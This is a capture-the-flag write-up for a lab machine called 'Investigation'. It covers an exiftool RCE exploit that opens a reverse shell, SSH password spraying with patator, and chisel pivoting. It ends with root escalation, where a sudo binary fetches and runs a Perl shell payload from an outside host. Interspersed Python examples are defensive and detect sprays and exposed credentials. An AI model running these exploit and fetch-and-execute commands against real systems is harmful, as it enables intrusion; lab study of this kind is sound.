Investigation
Interesting Things
Exiftool exploit
Noticing that the image upload returns an exiftool scan, I went straight for an exploit and found this one for exiftool < v12.24: https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
System Files
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
smorton:x:1000:1000:eForenzics:/home/smorton:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
backup:x:34:34::/var/backups:/usr/sbin/nologin
fwupd-refresh:x:113:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
_laurel:x:997:997::/var/log/laurel:/bin/false
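A dump like the one above is easier to read once it is reduced to the accounts that matter. The following is an added example (not part of this writeup) that parses passwd-format text and reports the checks an investigator wants first: which accounts have a real login shell, which have UID 0, which carry a password field that is not shadowed, and whether any UID is shared. The sample input is a constructed subset of the entries shown above.

```python
# Added example, not part of the writeup: triage an /etc/passwd dump so the
# investigator can see which accounts can actually log in and which look odd.

# Shells that cannot start an interactive session; anything else deserves a look.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# Constructed sample: a subset of the /etc/passwd entries shown above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
smorton:x:1000:1000:eForenzics:/home/smorton:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
_laurel:x:997:997::/var/log/laurel:/bin/false
"""


def parse_passwd(text):
    """Parse passwd-format text into dicts; skips comments and malformed lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed entry: skip it rather than crash on it
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({
            "name": name, "uid": int(uid), "gid": int(gid), "gecos": gecos,
            "home": home, "shell": shell,
            # "x" means the hash lives in /etc/shadow; "*" and "!" lock the account.
            # Anything else is an empty password or a hash sitting in world-readable passwd.
            "pw_not_shadowed": pw not in ("x", "*", "!"),
        })
    return entries


def triage(text):
    """Return the findings an analyst wants first from a passwd file."""
    entries = parse_passwd(text)
    seen_uids = {}
    duplicate_uids = set()
    for e in entries:
        if e["uid"] in seen_uids:
            duplicate_uids.add(e["uid"])  # two names sharing one identity on disk
        seen_uids[e["uid"]] = e["name"]
    return {
        "login_capable": [e["name"] for e in entries if e["shell"] not in NON_LOGIN_SHELLS],
        "uid_zero": [e["name"] for e in entries if e["uid"] == 0],
        "pw_not_shadowed": [e["name"] for e in entries if e["pw_not_shadowed"]],
        "duplicate_uids": sorted(duplicate_uids),
        "total": len(entries),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PASSWD).items():
        print(f"{key}: {value}")
```

On the sample this reports root and smorton as the only login-capable accounts, root as the only UID 0, and no shadow or duplicate-UID problems; on a real dump the interesting output is usually a second UID 0 entry or a service account that has been given /bin/bash.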
nmap
msgconvert
Windows Event log for Analysis.msg
Date: Tue, 16 Sept 2022 00:30:29 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=16778160761.9Eca.513719
Content-Transfer-Encoding: 7bit
Subject: Windows Event Logs for Analysis
From: Thomas Jones <thomas.jones@eforenzics.htb>
To: Steve Morton <steve.morton@eforenzics.htb>
Thread-Topic: Windows Event Logs for Analysis
Accept-Language: en-US
Content-Language: en-US
--16778160761.9Eca.513719
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=16778160760.ECD5c.513719
Content-Transfer-Encoding: 7bit
--16778160760.ECD5c.513719
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Hi Steve,
Can you look through these logs to see if our analysts have been logging on to the inspection terminal. I'm concerned that they are moving data on to production without following our data transfer procedures.
Regards.
Tom
Underneath this in the .msg is the attachment, a zip file.
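msgconvert turns the Outlook .msg into an ordinary RFC 5322 multipart message like the one above, so the attachment can be pulled out with the standard library. The following is an added example (not from this writeup or from msgconvert) that builds a constructed message in that shape, extracts every attachment, hashes it for the case notes, and strips path components from the filename before it is ever written to disk. The attachment bytes are a placeholder (zip magic plus text), not the real evtx-logs.zip.

```python
# Added example, not part of the writeup: parse the RFC 5322 message that
# msgconvert produces from an Outlook .msg, pull out the attachments and hash
# them so the evidence can be referenced in the case notes.
import email
import hashlib
import os
from email import policy
from email.message import EmailMessage


def build_sample_message():
    """Construct a message shaped like the msgconvert output above.

    The attachment is a constructed placeholder (zip magic plus text), not a real
    archive and not the evtx-logs.zip from the box.
    """
    msg = EmailMessage()
    msg["From"] = "Thomas Jones <thomas.jones@eforenzics.htb>"
    msg["To"] = "Steve Morton <steve.morton@eforenzics.htb>"
    msg["Subject"] = "Windows Event Logs for Analysis"
    msg.set_content("Hi Steve,\nCan you look through these logs?\nRegards.\nTom\n")
    fake_zip = b"PK\x03\x04" + b"constructed sample, not a real archive"
    msg.add_attachment(fake_zip, maintype="application", subtype="zip",
                       filename="evtx-logs.zip")
    return msg.as_bytes()


def safe_name(filename):
    """Strip path components so a hostile filename cannot escape the evidence dir."""
    name = os.path.basename(filename.replace("\\", "/"))
    return name or "unnamed"


def extract_attachments(raw):
    """Return one record per attachment: name, declared type, size, sha256, bytes."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = []
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        data = part.get_payload(decode=True)  # undoes base64 / quoted-printable
        found.append({
            "filename": safe_name(part.get_filename() or ""),
            "content_type": part.get_content_type(),
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "data": data,
        })
    return found


def summarize(raw):
    """Headers, plain-text body and attachment records for a raw message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    return {
        "from": str(msg["From"]),
        "to": str(msg["To"]),
        "subject": str(msg["Subject"]),
        "body": body.get_content() if body is not None else "",
        "attachments": extract_attachments(raw),
    }


if __name__ == "__main__":
    report = summarize(build_sample_message())
    print(report["subject"], "from", report["from"])
    for att in report["attachments"]:
        print(f"  {att['filename']} ({att['content_type']}, {att['size']} bytes)"
              f" sha256={att['sha256']}")
```

To run it on the real file, replace build_sample_message() with the bytes of the msgconvert output (open the .eml in binary mode); the declared content type comes from the sender, so check the magic bytes of what you extracted before trusting it.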
CVE-2022-23935
Searched for exiftool v12.37
./CVE-2022-23935.py 10.10.14.58 9001
[+] Connected!!!!
_____ __ __ ______ ___ ___ ___ ___ ___ ____ ___ ____ _____
/ ____|\ \ / /| ____| |__ \ / _ \|__ \ |__ \ |__ \ |___ \ / _ \|___ \ | ____|
| | \ \ / / | |__ ______ ) || | | | ) | ) |______ ) | __) || (_) | __) || |__
| | \ \/ / | __||______|/ / | | | | / / / /|______|/ / |__ < \__, ||__ < |___ \
| |____ \ / | |____ / /_ | |_| |/ /_ / /_ / /_ ___) | / / ___) | ___) |
\_____| \/ |______| |____| \___/|____||____| |____||____/ /_/ |____/ |____/
by 0xFTW
[+] Trying to bind to :: on port 9001: Done
[+] Waiting for connections on :::9001: Got connection from ::ffff:10.10.11.197 on port 57474
[*] Switching to interactive mode
bash: cannot set terminal process group (957): Inappropriate ioctl for device
bash: no job control in this shell
www-data@investigation:~/uploads/1677813942$ $ whoami
whoami
www-data
chisel proxychains
Pivoting to 127.0.1.1
https://ap3x.github.io/posts/pivoting-with-chisel/ So we connect to the machine through its IP 10.10.11.197, which will read as 127.0.0.1 on the machine. Looking in /etc/hosts we see additional entries for 127.0.1.1
Now we're connected through a SOCKS5 proxy

We're able to run commands against that machine's network
However there was nothing at 127.0.1.1 and this was a giant waste of time ("Great learning opportunity though")
patator
patator ssh_login port=22 host=10.10.11.197 user=FILE0 0=users password=FILE1 1=passwords
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
"class": algorithms.Blowfish,
23:47:22 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.2 at 2023-03-02 23:47 CST
23:47:22 patator INFO -
23:47:22 patator INFO - code size time | candidate | num | mesg
23:47:22 patator INFO - -----------------------------------------------------------------------------
23:47:23 patator INFO - 0 39 0.172 | smorton:Def@ultf0r3nz!csPa$ | 1 | SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
23:47:25 patator INFO - 1 22 2.141 | Olivia Rae:Def@ultf0r3nz!csPa$ | 11 | Authentication failed.
23:47:25 patator INFO - 1 22 2.514 | tjones:Def@ultf0r3nz!csPa$ | 2 | Authentication failed.
23:47:25 patator INFO - 1 22 2.515 | ethanjames:Def@ultf0r3nz!csPa$ | 4 | Authentication failed.
23:47:25 patator INFO - 1 22 2.502 | charlottelouise:Def@ultf0r3nz!csPa$ | 8 | Authentication failed.
23:47:26 patator INFO - 1 22 3.134 | Ethan James:Def@ultf0r3nz!csPa$ | 3 | Authentication failed.
23:47:26 patator INFO - 1 22 3.108 | ethan:Def@ultf0r3nz!csPa$ | 6 | Authentication failed.
23:47:26 patator INFO - 1 22 3.342 | ethan.james:Def@ultf0r3nz!csPa$ | 5 | Authentication failed.
23:47:26 patator INFO - 1 22 3.344 | charlotte.louise:Def@ultf0r3nz!csPa$ | 9 | Authentication failed.
23:47:26 patator INFO - 1 22 3.436 | charlotte:Def@ultf0r3nz!csPa$ | 10 | Authentication failed.
23:47:27 patator INFO - 1 22 3.771 | Charlotte Louise:Def@ultf0r3nz!csPa$ | 7 | Authentication failed.
23:47:28 patator INFO - 1 22 3.029 | olivarae:Def@ultf0r3nz!csPa$ | 12 | Authentication failed.
23:47:28 patator INFO - 1 22 2.195 | :Def@ultf0r3nz!csPa$ | 15 | Authentication failed.
23:47:29 patator INFO - 1 22 2.835 | oliva.rae:Def@ultf0r3nz!csPa$ | 13 | Authentication failed.
23:47:29 patator INFO - 1 22 3.523 | oliva:Def@ultf0r3nz!csPa$ | 14 | Authentication failed.
23:47:30 patator INFO - Hits/Done/Skip/Fail/Size: 15/15/0/0/15, Avg: 2 r/s, Time: 0h 0m 7s
We have SSH login for smorton!
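The run above is what a password spray looks like from the attacker's side: one password tried against a list of names. From the server's side it lands in sshd's auth log as one source failing against many different usernames inside a few seconds, sometimes with a success mixed in. The following is an added example (not from this writeup) of detection logic for that pattern; the auth log lines are constructed to mirror the run above, not copied from the box, and the 192.0.2.7 source is a constructed control case.

```python
# Added example, not part of the writeup: the defender's view of the spray above.
# One source, many distinct usernames, short window -> flag it, and show whether
# that same source also got an Accepted line.
import re
from collections import defaultdict
from datetime import datetime

FAILED_RE = re.compile(
    r"^(\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(
    r"^(\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (\S+) for (\S+) from (\S+) port \d+")

# Constructed sample auth.log: a spray from 10.10.14.58 that also hits a valid
# password, plus a single typo-then-key login from 192.0.2.7 as a control.
SAMPLE_AUTH_LOG = """\
Mar  2 23:47:23 investigation sshd[4102]: Accepted password for smorton from 10.10.14.58 port 50122 ssh2
Mar  2 23:47:25 investigation sshd[4105]: Failed password for invalid user tjones from 10.10.14.58 port 50130 ssh2
Mar  2 23:47:25 investigation sshd[4107]: Invalid user ethanjames from 10.10.14.58 port 50132
Mar  2 23:47:25 investigation sshd[4107]: Failed password for invalid user ethanjames from 10.10.14.58 port 50132 ssh2
Mar  2 23:47:26 investigation sshd[4109]: Failed password for invalid user ethan from 10.10.14.58 port 50134 ssh2
Mar  2 23:47:26 investigation sshd[4111]: Failed password for invalid user charlotte from 10.10.14.58 port 50136 ssh2
Mar  2 23:47:29 investigation sshd[4113]: Failed password for invalid user oliva from 10.10.14.58 port 50138 ssh2
Mar  2 23:49:10 investigation sshd[4120]: Failed password for smorton from 192.0.2.7 port 41000 ssh2
Mar  2 23:49:15 investigation sshd[4122]: Accepted publickey for smorton from 192.0.2.7 port 41002 ssh2
"""


def parse_ts(text):
    """Syslog timestamps carry no year; strptime defaults it, which is fine for windowing."""
    return datetime.strptime(re.sub(r"\s+", " ", text), "%b %d %H:%M:%S")


def detect_spray(log_text, distinct_users=4, window_seconds=60):
    """Per source: failure count, usernames tried, accepted logins, spray verdict."""
    fails = defaultdict(list)    # source -> [(ts, user)]
    accepts = defaultdict(list)  # source -> [(ts, method, user)]
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            fails[m.group(3)].append((parse_ts(m.group(1)), m.group(2)))
            continue
        m = ACCEPTED_RE.match(line)
        if m:
            accepts[m.group(4)].append((parse_ts(m.group(1)), m.group(2), m.group(3)))

    report = {}
    for src in set(fails) | set(accepts):
        events = sorted(fails[src])
        spray = False
        lo = 0
        # Sliding window: does any window_seconds span hold >= distinct_users names?
        for hi in range(len(events)):
            while (events[hi][0] - events[lo][0]).total_seconds() > window_seconds:
                lo += 1
            if len({u for _, u in events[lo:hi + 1]}) >= distinct_users:
                spray = True
                break
        report[src] = {
            "failures": len(events),
            "failed_users": sorted({u for _, u in events}),
            "accepted": sorted({u for _, _, u in accepts[src]}),
            "spray": spray,
        }
    return report


if __name__ == "__main__":
    for src, info in sorted(detect_spray(SAMPLE_AUTH_LOG).items()):
        flag = "SPRAY" if info["spray"] else "ok"
        print(f"{src:15} {flag:5} failures={info['failures']} "
              f"users={info['failed_users']} accepted={info['accepted']}")
```

The verdict keys on distinct usernames rather than raw failure count, which is what separates a spray from one user mistyping a password; a flagged source that also has an accepted login is the case to escalate first, because, as above, the spray found a working credential.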
ghidra
main function

Explanation of exploit
It looks like the function prints the Exiting... message and bails out in three cases:
- if it isn't given 3 parameters (remember that on Linux the program name itself is the first parameter, so that is the binary plus two arguments)
- if it isn't run via sudo, which is why the sudo -l entry granting access is necessary to exploit this binary
- if the 3rd parameter isn't this specific string:
lDnxUysaQn
Looking further we see that the second parameter needs to be a URL that gets fetched, because of the _stream:
__stream = fopen(*(char **)(param_2 + 0x10),"wb");
and that parameter ends up getting passed into a printf-style format string that runs perl %s, so whatever was downloaded is executed by perl with the binary's root privileges.
Foothold
RCE as www-data
/usr/local/investigation/.msg
Found SMTP information for two users SMTP:THOMAS.JONES@EFORENZICS.HTB SMTP:STEVE.MORTON@EFORENZICS.HTB
As well as a .msg with this hard-to-decipher bs

However, I found a Stack Overflow post with Python examples of how to extract the attachments: https://stackoverflow.com/questions/55596218/how-to-use-python-to-read-and-extract-data-from-msg-files-on-linux
Inside it was evtx-logs.zip and compressed inside was security.evtx
I found this guide https://www.alishaaneja.com/evtx/ for examining the evtx. While pulling the GitHub repo as the guide describes, I actually had the opportunity to contribute to the project: https://github.com/williballenthin/python-evtx/pull/83
Obtaining User Flag
After dumping the evtx to a text file I sorted it down to unique lines and grepped for users and passwords.
And we find a password
Def@ultf0r3nz!csPa$
Let's see if it goes to any of the users we've spotted
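Grepping the dump works, but the two questions Tom actually asked (who logged on to the inspection terminal, and was data moved without following procedure) map onto specific events: 4624 for logons and 4688 for process creation, whose CommandLine field is where credentials like the one above end up. The following is an added example (not from this writeup or from python-evtx) that reads events in the Windows event XML schema that evtx_dump.py emits, counts interactive logons per user, and flags 4688 command lines that carry a secret. The events are constructed samples; the password in them is a placeholder, not the one recovered from the box.

```python
# Added example, not part of the writeup: work Tom's two questions against a
# Security log dumped to XML (the schema python-evtx's evtx_dump.py emits):
# who logged on interactively (4624) and which process launches (4688) put a
# credential on the command line.
import re
import xml.etree.ElementTree as ET
from collections import Counter

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Logon types that mean someone was at the keyboard, on RDP, or unlocking.
INTERACTIVE_LOGON_TYPES = {"2", "7", "10", "11"}

# Heuristics for secrets in argv (case-insensitive). Tune them to your estate.
CRED_PATTERNS = [
    re.compile(r"/user:\S+\s+(?!/)\S+", re.I),            # net use ... /user:dom\u <pw>
    re.compile(r"\bnet\s+user\s+\S+\s+(?!/)\S+", re.I),   # net user <name> <pw>
    re.compile(r"(?:^|\s)(?:--password|-pw)\s*\S+", re.I),
    re.compile(r"password\s*[=:]\s*\S+", re.I),
]

# Constructed sample events. The credential is a placeholder value.
SAMPLE_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4624</EventID>
<TimeCreated SystemTime="2022-08-01 09:58:02"/><Computer>INSPECTION-TERMINAL</Computer></System>
<EventData><Data Name="TargetUserName">smorton</Data><Data Name="LogonType">10</Data>
<Data Name="IpAddress">10.0.5.23</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4624</EventID>
<TimeCreated SystemTime="2022-08-01 10:15:40"/><Computer>INSPECTION-TERMINAL</Computer></System>
<EventData><Data Name="TargetUserName">tjones</Data><Data Name="LogonType">2</Data>
<Data Name="IpAddress">-</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4624</EventID>
<TimeCreated SystemTime="2022-08-01 10:16:01"/><Computer>INSPECTION-TERMINAL</Computer></System>
<EventData><Data Name="TargetUserName">ANONYMOUS LOGON</Data><Data Name="LogonType">3</Data>
<Data Name="IpAddress">10.0.5.40</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4624</EventID>
<TimeCreated SystemTime="2022-08-02 08:02:11"/><Computer>INSPECTION-TERMINAL</Computer></System>
<EventData><Data Name="TargetUserName">smorton</Data><Data Name="LogonType">10</Data>
<Data Name="IpAddress">10.0.5.23</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4688</EventID>
<TimeCreated SystemTime="2022-08-02 08:05:30"/><Computer>INSPECTION-TERMINAL</Computer></System>
<EventData><Data Name="SubjectUserName">smorton</Data>
<Data Name="NewProcessName">C:\Windows\System32\net.exe</Data>
<Data Name="CommandLine">net use Z: \\prod-fs\transfer /user:EFORENZICS\smorton ExamplePassw0rd!</Data>
</EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4688</EventID>
<TimeCreated SystemTime="2022-08-02 08:06:02"/><Computer>INSPECTION-TERMINAL</Computer></System>
<EventData><Data Name="SubjectUserName">tjones</Data>
<Data Name="NewProcessName">C:\Windows\System32\notepad.exe</Data>
<Data Name="CommandLine">notepad.exe C:\Users\tjones\notes.txt</Data>
</EventData></Event>
</Events>"""


def iter_events(xml_text):
    """Yield each Event as a flat dict: id, time, computer, and EventData by Name."""
    root = ET.fromstring(xml_text)
    for ev in root.iter("{%s}Event" % NS["e"]):
        system = ev.find("e:System", NS)
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        yield {
            "id": system.findtext("e:EventID", default="", namespaces=NS),
            "time": system.find("e:TimeCreated", NS).get("SystemTime", ""),
            "computer": system.findtext("e:Computer", default="", namespaces=NS),
            "data": data,
        }


def analyze(xml_text):
    """Interactive logons per user, plus 4688 events whose argv carries a credential."""
    logons = Counter()
    exposures = []
    for ev in iter_events(xml_text):
        d = ev["data"]
        if ev["id"] == "4624" and d.get("LogonType") in INTERACTIVE_LOGON_TYPES:
            logons[d.get("TargetUserName", "?")] += 1
        elif ev["id"] == "4688":
            cmd = d.get("CommandLine", "")
            hit = next((p for p in CRED_PATTERNS if p.search(cmd)), None)
            if hit:
                exposures.append({"time": ev["time"], "computer": ev["computer"],
                                  "user": d.get("SubjectUserName", "?"),
                                  "process": d.get("NewProcessName", "?"),
                                  "command_line": cmd, "pattern": hit.pattern})
    return {"logons": dict(logons), "credential_exposure": exposures}


if __name__ == "__main__":
    result = analyze(SAMPLE_XML)
    print("interactive logons:", result["logons"])
    for hit in result["credential_exposure"]:
        print(f"{hit['time']} {hit['user']} {hit['process']}: {hit['command_line']}")
```

Two things to keep in mind when pointing this at a real log: 4688 only carries a CommandLine field if the "Include command line in process creation events" audit policy is on, and the flagged lines contain the secret itself, so the report should be handled like the credential it exposes and the password rotated.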
Root Escalation
Spotting the vulnerability
Right away we notice we have sudo access to a binary at /usr/bin/binary
sudo -l
Matching Defaults entries for smorton on investigation:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User smorton may run the following commands on investigation:
(root) NOPASSWD: /usr/bin/binary
Obtaining Root Flag
A quick and dirty Perl exploit that spawns a shell is all we need. Contents of root-escalation.pl:
-e exec "/bin/sh"
sudo /usr/bin/binary http://10.10.14.46:9000/root-escalation.pl lDnxUysaQn
Running...
# whoami
root
# cat /root/root.txt
308d76b132a51118c5e64dd4848a2391
Flags
User Flag
d42c068a48e318e84cc03225dd0aca97
Root Flag
308d76b132a51118c5e64dd4848a2391